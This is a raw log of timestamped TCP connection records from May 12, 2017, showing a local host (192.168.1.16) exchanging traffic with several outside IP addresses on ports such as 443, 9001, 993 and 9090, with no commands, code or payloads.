May 12, 2017 18:54:28.190692902 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.190721035 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.190756083 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.190856934 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.190871954 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.190900087 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.190920115 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.192555904 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.199165106 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.199188948 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.199218988 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.199325085 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.199878931 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.212642908 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.213386059 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.213537931 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.213567972 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.213579893 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.213645935 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.213766098 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.213783026 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.213793993 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.213839054 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.213891983 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.222851992 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.222867012 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.222887039 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.222938061 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.239032030 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.239048958 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.239058018 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.239120007 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.248209953 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.248226881 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.248234034 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.248311996 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.248653889 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.288450003 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.305226088 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.305248022 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.305272102 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.306330919 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.308501005 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.309952974 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.309977055 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.310105085 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.310127974 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.310722113 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.310744047 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.310909986 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.310930967 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.312273979 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.312289953 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.312391043 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.312408924 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.312747002 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.312772989 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.313357115 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.313371897 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.313693047 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.313719034 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.313946962 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.313954115 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.314090014 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.314116001 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.314140081 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.314152956 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.314234018 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.314259052 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.314352036 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.314364910 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.314505100 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.314528942 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.323786974 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.323803902 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.324124098 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.324158907 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.329955101 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.329971075 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.330542088 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.330558062 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.333030939 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.333045959 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.333108902 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.333126068 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.341787100 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.342051029 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.342936039 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.342955112 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.347162008 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.347181082 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.347193003 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.347428083 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.348656893 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.348679066 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.348690987 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.348819971 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.349662066 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.356894016 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.356920004 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.356935978 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.357012987 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.357798100 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.357820988 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.357950926 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.357994080 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.367095947 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.367125034 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.367228031 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.367250919 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.376270056 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.376300097 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.376354933 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.376374006 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.376521111 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.380218029 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.380240917 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.380312920 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.388513088 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.388533115 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.388547897 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.388618946 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.389483929 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.389507055 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.389522076 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.389606953 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.390212059 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.397116899 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.397154093 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.397177935 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.397269011 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.398653984 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.398680925 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.398696899 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.398768902 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.399616003 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.399640083 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.399652958 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.399799109 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.407882929 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.407911062 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.407936096 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.408019066 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.408998966 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.409023046 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.409039974 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.409110069 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.413985968 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.414017916 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.414031982 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.414177895 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.417877913 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.417898893 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.417915106 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.418039083 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.418437958 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.418591976 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.418612957 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.418625116 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.418706894 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.426814079 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.426842928 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.426860094 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.427037954 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.428188086 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.428203106 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.428210020 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.428288937 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.435100079 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.435122967 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.435138941 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.435204029 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.437499046 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.437515020 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.437524080 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.437618971 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.439769983 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.439786911 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.439796925 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.439891100 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.440743923 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.446753979 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.446784973 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.446801901 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.446901083 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.450074911 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.450098991 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.450110912 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.450196028 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.451677084 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.451697111 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.451710939 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.451786995 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.456357002 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.456378937 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.456389904 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.456521034 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.461031914 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.461055040 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.461067915 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.461157084 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.461165905 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.461188078 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.461205959 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.461283922 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.461293936 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.461308956 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.461388111 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.462997913 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.465523005 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.471946955 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.471967936 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.472115040 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.472147942 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.476092100 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.476114988 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.476238012 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.476273060 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.479476929 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.479491949 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.479574919 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.479604006 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.484668970 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.484694958 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.484793901 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.484798908 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.484808922 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.484822989 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.484841108 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.484941959 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.488789082 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.488815069 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.488835096 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.488941908 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.503079891 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.503119946 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.503154039 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.503278971 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.503823996 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.503876925 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.540452957 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.559111118 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.559133053 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.559199095 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.559216022 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.582871914 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.582972050 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.582992077 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.593415022 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.593442917 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.593512058 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.593533993 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.602926016 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.602956057 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.603048086 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.603070021 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.812474966 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.812650919 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:36.766637087 CEST49197443192.168.1.1685.235.250.88
May 12, 2017 18:54:36.766689062 CEST4434919785.235.250.88192.168.1.16
May 12, 2017 18:54:36.766911983 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:36.766935110 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:36.767024040 CEST49197443192.168.1.1685.235.250.88
May 12, 2017 18:54:36.767398119 CEST49197443192.168.1.1685.235.250.88
May 12, 2017 18:54:36.767416000 CEST4434919785.235.250.88192.168.1.16
May 12, 2017 18:54:36.933973074 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:36.933999062 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:36.934073925 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:36.943279028 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:36.943296909 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:36.943309069 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:36.943366051 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:36.976470947 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:36.976519108 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:36.976541996 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:36.976604939 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:36.976674080 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:36.976696968 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:36.976711988 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:36.976732969 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:37.003786087 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:37.003801107 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:37.003830910 CEST4434919785.235.250.88192.168.1.16
May 12, 2017 18:54:37.003880024 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:37.003896952 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:37.008485079 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:37.008738995 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:37.008754015 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:37.008764029 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:37.008843899 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:37.011817932 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:37.204504013 CEST4434919785.235.250.88192.168.1.16
May 12, 2017 18:54:37.204615116 CEST49197443192.168.1.1685.235.250.88
May 12, 2017 18:54:37.236485958 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:37.236579895 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:37.338212013 CEST49197443192.168.1.1685.235.250.88
May 12, 2017 18:54:37.338238001 CEST4434919785.235.250.88192.168.1.16
May 12, 2017 18:54:37.339576006 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:37.340181112 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:37.340198040 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:37.394237041 CEST4434919785.235.250.88192.168.1.16
May 12, 2017 18:54:37.665110111 CEST49197443192.168.1.1685.235.250.88
May 12, 2017 18:54:48.826771975 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:54:48.826826096 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:48.826921940 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:54:48.827579975 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:48.827609062 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:48.827668905 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:48.828286886 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:48.828313112 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:48.828371048 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:48.829576969 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:54:48.829598904 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:48.829900980 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:48.829922915 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:48.830231905 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:48.830252886 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:48.848814964 CEST49197443192.168.1.1685.235.250.88
May 12, 2017 18:54:48.848848104 CEST4434919785.235.250.88192.168.1.16
May 12, 2017 18:54:48.969841003 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:48.972634077 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:48.972661018 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:48.979178905 CEST4434919785.235.250.88192.168.1.16
May 12, 2017 18:54:48.979202032 CEST4434919785.235.250.88192.168.1.16
May 12, 2017 18:54:48.979347944 CEST49197443192.168.1.1685.235.250.88
May 12, 2017 18:54:48.980006933 CEST49197443192.168.1.1685.235.250.88
May 12, 2017 18:54:48.980027914 CEST4434919785.235.250.88192.168.1.16
May 12, 2017 18:54:49.041563988 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.076248884 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.076273918 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.092175007 CEST4434919785.235.250.88192.168.1.16
May 12, 2017 18:54:49.134407997 CEST49197443192.168.1.1685.235.250.88
May 12, 2017 18:54:49.134442091 CEST4434919785.235.250.88192.168.1.16
May 12, 2017 18:54:49.158750057 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.158776999 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.158885956 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.159773111 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.159797907 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.239756107 CEST4434919785.235.250.88192.168.1.16
May 12, 2017 18:54:49.239799976 CEST4434919785.235.250.88192.168.1.16
May 12, 2017 18:54:49.239831924 CEST4434919785.235.250.88192.168.1.16
May 12, 2017 18:54:49.240518093 CEST49197443192.168.1.1685.235.250.88
May 12, 2017 18:54:49.249057055 CEST4434919785.235.250.88192.168.1.16
May 12, 2017 18:54:49.249083042 CEST4434919785.235.250.88192.168.1.16
May 12, 2017 18:54:49.249104023 CEST4434919785.235.250.88192.168.1.16
May 12, 2017 18:54:49.249619007 CEST49197443192.168.1.1685.235.250.88
May 12, 2017 18:54:49.269402027 CEST4434919785.235.250.88192.168.1.16
May 12, 2017 18:54:49.269429922 CEST4434919785.235.250.88192.168.1.16
May 12, 2017 18:54:49.269439936 CEST4434919785.235.250.88192.168.1.16
May 12, 2017 18:54:49.269536018 CEST49197443192.168.1.1685.235.250.88
May 12, 2017 18:54:49.297836065 CEST4434919785.235.250.88192.168.1.16
May 12, 2017 18:54:49.297980070 CEST4434919785.235.250.88192.168.1.16
May 12, 2017 18:54:49.297995090 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.298559904 CEST49197443192.168.1.1685.235.250.88
May 12, 2017 18:54:49.300739050 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.300764084 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.301175117 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.301270962 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.301275969 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.301345110 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.301883936 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.301901102 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.301985025 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.301999092 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.302419901 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.302438021 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.302491903 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.302504063 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.302809954 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.302824020 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.302898884 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.302908897 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.303211927 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.303227901 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.303289890 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.303301096 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.303663015 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.303675890 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.303740025 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.303750038 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.304070950 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.304085016 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.304214001 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.304227114 CEST99349199195.154.107.23192.168.1.16
